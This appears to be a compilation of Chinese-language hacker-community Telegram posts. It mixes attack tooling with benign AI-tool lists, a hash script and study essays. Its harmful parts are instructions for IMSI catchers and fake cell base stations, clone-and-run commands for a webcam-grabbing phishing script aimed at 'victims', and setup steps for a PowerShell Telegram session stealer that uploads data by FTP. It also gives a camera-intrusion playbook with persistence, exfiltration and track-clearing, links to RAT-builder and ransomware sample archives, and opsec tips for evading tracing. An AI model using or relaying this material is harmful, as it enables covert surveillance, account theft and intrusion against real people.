#黑客工具
#蜂窝网络

1.刀片射频—
特点：IMSI陷阱，主动拦截方法，被动拦截方法，创建自己的蜂窝网络

地址：https://github.com/PentHertz/OpenBTS

2.RTL-SDR
电视调谐器也是 SDR，同时非常便宜。 每个 建立 BS 的人都必须拥有它。它的主要目的是测量到真正合法BS的距离， 并且根据这个距离，用户必须选择他的假BS的信号强度。 它还可以制作出色的IMSI陷阱

特点：IMSI陷阱，被动拦截方法

购买地点：某宝

软件：https://github.com/Oros42/IMSI-catcher
🧙🏻‍♂️某宝搜索即可购买原型。


即用型操作系统版本：
对于许多人来说，构建和支持所有软件组件以与上述设备一起使用是很困难的，因此在下面您可以看到现成的组件：
GNU-无线电
在安装 SDR 批量的情况下进行构建。支持 RTL-SDR/BladeRf/HackRf
GNU-Radio LiveCD 14 （英语）
GNU-Radio LiveCD 16 （英语）
RTL-SDR/HackRF

预装软件，用于构建IMSI陷阱和使用HackRF
RTL-SDR/HackRF
BladeRF Pentoo
针对 BladeRf 构建
Osmocom公司
TyphonOS 操作系统

@ESN黑客社区群入口

此话题交流👇🏻

#工具 #黑客
从普通手机黑客网络摄像头
您可以使用该脚本毫无问题地破解用户网络摄像头。
安装：
$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh
完成最后一条命令后，启用设备上的 2 个项目 - “移动互联网”和“Wi-Fi 热点”。

我们返回终端并选择“Ngrok”项目。接下来，将生成一个特殊链接，我们将其扔给受害者并等待。如果成功，输入命令查看照片：
$ termux-esnarsenal.png

@ESN黑客社区群入口

此话题交流👇🏻

一个脚本，您可以使用它毫无问题地破解用户网络摄像头。

安装：
$ git 克隆 https://github.com/noob-hackers/grabcam
$cd 抓拍相机
$ chmod +xgrabcam.sh
$ bashgrabcam.sh

完成最后一条命令后，启用设备上的 2 个项目 - “移动互联网”和“Wi-Fi 热点”。

- 返回终端并选择“Ngrok”项目。接下来，将生成一个特殊链接，我们将其扔给受害者并等待。如果成功，输入命令查看照片：
$ termux-打开摄像头名称.png

@ESN黑客社区群入口

此话题交流👇🏻

👉这是Powershell脚本，用于抓取电报数据并使用ftp将文件上传到网络服务器。

⭐️用法：

📉打开CMD提示符并运行“run.bat”
📉选择选项1（将ps1脚本安装到exe）
📉选择选项2（将ps1转换为exe）
📉打开“steal_session.ps1”并编辑ftp - 服务器|用户名|密码
📉在您的网络服务器中创建文件夹“steal”

⛈ 电报窃取者在行动

⚫️将tdata文件上传到您的网络服务器后，下载zip文件并将其解压到您的PC上。
⚫️现在，复制 tdata 文件夹并将其粘贴到目录中：C:\Users\your_username\AppData\Roaming\Telegram Desktop。
⚫️在粘贴tdata文件夹之前，请确保您已删除PC上现有的tdata文件夹。

下载地址：
https://github.com/Zahu9821/Nivistealer

最新地址：
https://github.com/FazeWasTaken/Nivistealer

#Topert4

初级破解网络,酒店或监控摄像头步骤：

1.侦查
-收集有关目标网络、酒店或监控摄像头的信息。这包括识别 IP 地址、子网掩码、默认网关和 DNS 服务器。您可以使用 Nmap、NetScan 和 DNSenum 等工具来实现此目的。

2.漏洞扫描
- 识别目标网络或监控摄像头中的漏洞。使用 OpenVAS、Nessus 和 Metasploit 等工具扫描开放端口、服务和潜在漏洞。

3.利用与爆破
- 利用已识别的漏洞来访问目标网络或监控摄像头。例如，如果你发现一个弱密码，你可以使用 John the Ripper 或 Cain & Abel 等工具来破解它。

4.后期利用
- 一旦您获得访问权限，您就可以使用 Wireshark、Tcpdump 和 Nmap 等工具来分析网络流量并识别进一步利用的潜在目标。
5.持久性
- 通过创建后门、设置远程访问和隐藏踪迹来保持对目标网络或监控摄像头的访问。Metasploit 和 PowerShell Empire 等工具可以帮助实现这一点

6.拖拽
- 从目标网络或监控摄像头中提取敏感数据。为此，请使用 FileZilla 和 WinSCP 等工具。

7.搽屁股
- 使用 BleachBit 和 CCleaner 等工具删除你的任何活动痕迹。

8.针对公司
- 要针对特定​​公司的监控摄像头，您需要收集有关其网络基础设施的信息，包括 IP 地址、子网掩码和 DNS 服务器。您可以使用 Nmap 和 NetScan 等工具来实现此目的。获得这些信息后，您可以使用 OpenVAS 和 Nessus 等漏洞扫描程序来识别摄像头中的潜在漏洞。然后，您可以使用 John the Ripper 和 Cain & Abel 等工具利用这些漏洞来访问摄像头。

😊：具体实践方法你们自己研究与讨论。

[ 低 ] 摄像头破解|技术交流群 @esntking_bot

🤖 像专业人士一样构建 AI 应用的开源工具 （1）
-可用于创建 AI 应用程序的完整工具集：生成模型、用于与 AI 代理协作的框架等等。
1-.OpenMusic是一种用于生成任何风格的音乐曲目的高级模型。
2-.Pdf2Audio – 读取任何语言的 PDF 文档。
3-.FaceFusion – 允许您对照片和视频中的脸部进行任何操作：替换一个脸部、更改个人特征、将唇部动作与所需的音频同步、年龄或恢复活力。
4-.PuLID for FLUX – 根据参考生成任何照片和插图。
5-.GPT Crawler——从指定的 URL 收集数据并在OpenAI平台上创建自定义 GPT 。
6-.Vanna – 允许您使用自然语言与数据库进行通信。适用于任何 LLM。
7-.Chat2DB是一个使用自然语言与数据库交互的高级AI 界面
8-.Micro Agent—编写代码、测试代码、必要时进行编辑——直到任务完成。适用于任何开源和专有模型。
9-.PrivateGPT –与您的文档进行私人聊天。适用于本地安装的模型，无需互联网连接，并保证不会将机密数据发送到任何地方

Expand Link：(2)
➡️https://t.me/topert4/157

#Ai #开源工具 #github #人工智能 #Topert4

🤖 像专业人士一样构建 AI 应用的开源工具 （2）
-可用于创建 AI 应用程序的完整工具集：生成模型、用于与 AI 代理协作的框架等等。
10-.BlackHat Python-高级的Ai与平台结合的成长性学习频道,本文的开源内容均以该频道进行收集。
11-.Perplexica是一个人工智能搜索引擎，是 Perplexity 的开源替代品。
12-.Mem0 – 通过为 AI 助手和代理添加一层内存来提高其性能。这使得与人工智能的互动尽可能个性化
13-.AgentOps – 帮助您创建、评估和监控AI 代理从原型到生产的性能。主要特点：
14-.E2B是一个专为AI 代理和AI 应用程序设计的安全、隔离的云环境（沙盒）。沙盒允许人工智能代理和应用程序在长寿命环境中运行并使用与人类相同的工具。
15-.AutoGen是一个用于创建AI 代理并支持多个代理协作解决问题的框架。主要特性和功能：
16-.Firecrawl – 从所需站点收集数据（绕过机器人保护）并将信息转换为所需格式的结构化文件 – Markdown、html 或 json。
17-.MindsDB是一个基于企业数据创建AI应用程序的平台。可以使用任何来源的数据——数据库、矢量存储、商业应用程序等。
18-.LanceDB是一个用于构建多模式 AI 应用程序的高级矢量数据库：
19-.DeepEval是一个易于使用的LLM 评估和测试库，是HumanLoop 的开源替代品。允许您测试模型性能的各个方面——响应的相关性、可靠性、幻觉程度等。既可以与云服务一起工作，也可以在您的计算机上本地工作。
20-.LangChain是一个用于创建、配置和部署基于 LLM 的应用程序的框架。

Expand Link：(3)
➡️https://t.me/topert4/158

#Ai #开源工具 #github #人工智能 #Topert4

🤖 像专业人士一样构建 AI 应用的开源工具 （3）
-可用于创建 AI 应用程序的完整工具集：生成模型、用于与 AI 代理协作的框架等等。
21-.LiteLLM可以轻松与 OpenAI 格式的 API 配合使用，包括 Bedrock、Huggingface、VertexAI、TogetherAI、Azure、Groq 等。它充当一种代理服务器，负责管理 API 调用、处理响应和优化模型的使用。
22-.SWIRL使您能够创建RAG 应用程序，用于数据管理、信息检索和任何方向的常规流程自动化——从客户服务到加速开发和提高员工生产力。非常适合需要快速实施人工智能、同时又符合企业安全标准且无需重新设计现有数据存储和处理基础设施的公司。
23-.Gognita是一个旨在简化开发和部署RAG 系统过程的框架。支持多种文档搜索方法和向量表示；完全由 API 驱动，可轻松与其他系统集成。
24-.LLMWare是一个用于创建供企业使用的强大且安全的RAG 系统的框架。它支持集成可在安全的内部环境中部署的小型专用模型。
25-.Letta是一个简单易用的框架，用于创建代理需要长期记住和分析信息的应用程序。
26-.W&B允许您跟踪和可视化机器学习工作的所有阶段——从数据准备到实际工作中模型的实施
27-.ONNX Runtime是一种用于加速不同平台上机器学习模型的工作（推理）和训练的工具。它易于使用——只需在现有的 PyTorch 脚本中添加一行代码即可加快 NVIDIA GPU 上的训练速度。
28-.Topert4 - 长期更新关于AI开源相关工具,每一篇文章均可以长期关注更新到上限后在重新开设（X）部分。

请持续关注这个内容,这个内容将增加到字数限制以后在重新进行整理。
initial link (1)
➡️https://t.me/topert4/156
Expand Link：(4)
➡️
#Ai #开源工具 #github #人工智能 #Topert4

‼️导航 👉🏻 二零二五年‼️

👥ESN [ 黑客 hacker ] 开放性技术交流群 ：
👥地址：https://t.me/+SzVBSknAKiZhYTc1

🛞2025可以学那些编程语言：

排名不分前后,只是适当做了简单的整理。

- Python
- JavaScript
- Rust
- Kotlin
- Go

🛞2025年构建Ai应用的开源工具：
- 像专业人士一样构建 AI 应用的开源工具（1）
- 像专业人士一样构建 AI 应用的开源工具（2）
- 像专业人士一样构建 AI 应用的开源工具（3）

#hacker@topert4 #hacker #自学

关于关闭论坛我有一些想说的：

Topert4的创建完全是为了避免比”溯源“,作为社区的一名核心管理人员,我承认我与另外一名管理arsenal有着一些 尽可能不违规的小动作,对所有发表的内容进行了“阉割”。

简单的说从2020年开始|所有发布内容均开始进行大面积内容阉割,所有内容核心均被切乱。原因是因为目前可以运营的“媒介”就剩下微信公众号。至于论坛也真的是没有时间在打理。因为目前的主要受益在于做项目。搞论坛毫无收益。

至于论坛会不会重新搞～答案是“会”。不过要怎么搞还是等到时候100人投票决定。因为维护中文“黑客”进攻性论坛,要比其他论坛贵好几倍。而且风险很大。。

总不至于为了几千几万自己进去蹲3-7年吧。并不是我们“怂”。还是因为我们都是有家庭的有自己的正常工作。为了自己这点B兴趣爱好 拿未来去换有点不值当。

我们只是喜欢,并不是痴迷。我们可以两个人三个人通宵熬夜交流心得,但是不会与任何一个陌生人说一句话,因为我们只会在自己的认为安全的领域内进行活跃。

关于内容的过程,在公众号都会做切割,因为内容在公众号发布属于违法ZF法律协议。就如正常的渗透，我们也只能发布成为“道德渗透测试”。在说了新手初期道德渗透测是里的切割皮毛技术可以很好的让你工具。当然这里并不是说我们多牛,而是要说,不单单是我们进行切割,国内的所以平台与论坛都进行了对应的切割。我们只是一群社会中的普通人。

CTF？我们也想过建立自己的CTF,但是又有谁算过一个支持10-100人同时在线的CTF平台+服务器运营费用？自己构建本地？是很简单,但是又会有谁在意？再说了我们都是普通人,每个月就那点拿的出台面的几个B子。除了养家贷款,还能剩几个钱？

接私活的环境也不如以前,现在都是背后捅刀子的,以前你去接私活无所谓。现在指不定就人举报到你现在的工作地方,直接就是背锅+开除。劳动仲裁都去不了。

在目前的大多数人眼里；赚钱的只有拿着手机直播+办公室电脑文员。如果你一个人坐在电脑面前搞技术/ 全部是家人看不懂的东西。我相信生活绝对是每天吵架2小时+离婚。说你不务正业。毕竟在所有人眼里一个月有月薪的才是努力上进的人。搞技术没有官职所以搞技术属于半长期运营。短期内是看不到钱的。

🙉不知道你们家人是怎么想的～反正我只要做电脑面前超过3小时,就是在玩游戏！然后吵架！在家庭生活面前,一切（晓之以情.动之以理）都是扯淡。每个月有必须的要还车房贷。现在只能做现货,期货不敢玩！！

所以在当下社会 ：没有好的靠山,谁敢去做好人！！！

当下社会决绝方案：水可载舟亦可覆舟。没有靠山就自己组建自己的靠山。社区未来走多远就在于社区有多少靠山。尽管这是去年的概念。但是今年依旧实用。

其他的在说吧～～～毕竟免费的一大堆呢！等我想好了在说！！

反正我就一个执念“中国”才是全球最牛逼的！！！！！！

基础硬件系统具备条件：

- 16Gb RAM
- 500Gb+1 硬盘
- GPU 8G显存以上
- CPU 8核最低
- 显示器122hz

Kali linux 正常运行要求：
- 最低4-8G RAM
- 300G储存空间
- CPU双核即可

VM/VB虚拟机镜像安装系统：
- Windows10-11（企业版） [ Linux ]
- Debian
- Ubuntu
- Kali linux

——
主要硬件设备

- 个人路由器 （获取超级管理员权限）
- 个人交换机 （思科|其他）
- 个人服务器 （非虚拟机|合适集群）
- 推荐设备购买：https://t.me/topert4btc

恶意软件研究眼本与源代码
- 带有源代码的病毒样本

请注意，下载的文件是正在运行的病毒。其中一些会尝试感染您的计算机。在任何情况下都不要在您的主计算机上运行下载的文件。我也不建议在没有恶意软件分析知识的情况下下载病毒样本。在任何情况下，频道 @Topert4 对您对您自己或他人的计算机造成的任何损害不承担任何责任。

我强烈建议使用虚拟机进行病毒分析。不要忘记那些试图传播并从虚拟机中逃脱的恶意蠕虫。为了避免这种情况，我建议禁用虚拟机的所有客户添加、网络访问等.

👉🏻Githab |@Topert4

这个脚本来：
将输入的字符串计算成 SHA3-512 哈希。

验证某个字符串是否与已有哈希值匹配。

# @Topert4
# Black Hat Python
# 2025离线认证备选方案

import hashlib

def sha3_512_hash(text):
    """生成 SHA3-512 哈希值"""
    return hashlib.sha3_512(text.encode('utf-8')).hexdigest()

def verify_hash(input_text, known_hash):
    """验证输入的文本是否匹配指定哈希值"""
    return sha3_512_hash(input_text) == known_hash.lower()

# 示例用法
if __name__ == "__main__":
    print("=== SHA3-512 加密/验证脚本 ===")
    choice = input("你想要加密你自己的文字加密：").strip().lower()

    if choice == 'e':
        text = input("请输入要加密的内容：")
        hashed = sha3_512_hash(text)
        print(f"SHA3-512 哈希值是：\n{hashed}")

    elif choice == 'v':
        text = input("请输入要验证的原文：")
        known_hash = input("请输入已知哈希值：")
        if verify_hash(text, known_hash):
            print("✅ 匹配成功：原文对应该哈希值")
        else:
            print("❌ 不匹配：原文与哈希值不一致")

    else:
        print("请输入有效的选项：e（加密）或 v（验证）")

深度计划起源

"深度"的重要性：　

如果你我的知识结构只有认知而没有深度，就会导致——其你我的能力没有突出的亮点——这类人肯定会直接被Ai产物代替。

2015年的时候我记得有一批文章很不错！把自己的目标进行量化然后在一步一步的学习,但是可惜是《阉割版》的。因为中间有部分是以下载第三方数据库为例的。

“深度”指的是在H领域的深入了解和研究。从2024的趋势开始“计算机行业”领域开始‘卷“边。社区以 计算器信息安全中的 ”红队”领域选择深度开始。我们需要清楚在“红队”所有涉猎的子域都有哪些才能更好的列出自己的主要学习内容,从而不会在学习的过程中偏离轨道。

“深度”红队（草稿）分支子域
1- 网络渗透
2- 渗透测试
3- WEB渗透
4- 漏洞利用
5- 工具编写
6- WFII审计
7- 内网渗透

以上的（6）个步骤,每个步骤基本上都被培训机构进行的切割,并且做成了 < 阉割版 > 的内容。付费后你会发现什么都没学会！因为忽略了这六个步骤的重要因素（依赖关系） 简单的说一个基础概念：渗透测试依赖WEB渗透依赖网络渗透依赖内网渗透。如过程中少了一个依赖,就会导致你的技术出现瓶颈,未来发展路线会越来越小。


👀子域 🤜🏻 知识结构 🤛🏻 例子：

首先你需要清楚的知道在黑客技术的知识结构,简单的说就是你对信息的了解。如你(需要)一台计算机,我们需要知道一台计算机的物理的结构:硬盘+电源+系统+主板+内存+显卡+显示器.

知道所需要的硬件组合以后,我们需要整理并且清楚的知道电脑正常启用的步骤.想要开机就需要用到主板供电后才能进行下一步，但是主板供电我们需要解决第一件事情,就是“电源”的安装。也就是说我们需要的第一步并不是主板供电,而是机箱整个供电配置。所以这是我们需要清楚的例子。

“深度”是需要建立在正确的知识结构上,如果你的知识结构出现了一些混乱，那就要进行“及时止损”,撤离的梳理一下自己的热爱领域的（知识结构）。

“深度” 是在建立正确的知识结构认知选择固定的领域进行深入学习。这是完整的版的“深度红队计划” 介绍概念。

完结日期：2025年4月14日
修改日期：2025年4月20日
后半部：https://t.me/topert4/208

仅供学习之用，包含 450 多个经典/现代木马构建器的详尽样本，包括屏幕截图。其中一些嵌入了源代码，一些已被破解！

▶️888Rat
▶️AndroRat
▶️ArcticRat
▶️Asylum
▶️BabylonRat
▶️BitRat
▶️BlueBananaRat
▶️CerberusRat
▶️CometRat
▶️CrimsonRat
▶️CraxsRat
▶️DcRat
▶️EagleSpy
▶️EverSpy
▶️G700Rat
▶️HadesRat
▶️HiddenzHVNC
▶️KJW0rm
▶️LimeRat
▶️MobiHook
▶️NanoCore
▶️NjWorm
▶️NjRat
▶️PandoraHVNC
▶️PegasusHVNC
▶️Remcos Professional
▶️SilentSpy
▶️SlickRAT
▶️SpyMax
▶️SshRat

下载地址：https://github.com/Topert4/Ransomware-Database

存档密码：infected

#Rat @Topert4 #漏洞 #黑客

仅用于教育目的，勒索软件/擦除器木马的样本包括屏幕截图/勒索记录。


地址：https://github.com/Topert4/Ransomware-Database

password: infected

#勒索软件 #源代码 @Topert4

壹.完整的成员OPESC都有那些：
1 .Btc付费的Vpn：一定不能使用任何可追溯的方式交易。
2 .干净的 Telegram - 非+86手机号
3 .新建一个虚拟机用于登入电报。
4 .OpenPGP 公钥|用于机密邮箱交流

这个虚拟机只能安装2个软件：如

雷鸟地址：https://www.thunderbird.net/
虚拟机可以在公频进行下载：https://t.me/topert4/87
浏览器使用火狐：https://www.mozilla.org/zh-CN/firefox/

警告：

关于Kali linux与其他打算使用Linux做黑客攻击系统的一定不要使用中国源。除非你想进去。
别用中国源内提供的火狐浏览器+谷歌浏览器 如果需要使用两个一定要去官网下载。

不要下载与安装任何第三方 中文版的破解工具。除非你可以清晰的看得懂源代码。否者就是在给别人做嫁衣。

#匿名 #运营安全

零.申请成员以后你想要做那些？

1.下载官网纯净版的Windows或Mac与Linux。
2.重新安装你现在的主系统|以保证你接下的内容不被“官方C2服务器收集”。

所有内容需要在你的新建虚拟机中进行注册与第一次登入,如果你在你当前的主机内容进行注册与登记,那么也就是说你现在的内容已被上传到某最高权限的数据库内。

不用怀疑,从你在购买国产手机+国内ID苹果手机的时候,你的所有数据都已经在最高权限数据库内。数据只是可以直接溯源到你。

#匿名 #运营安全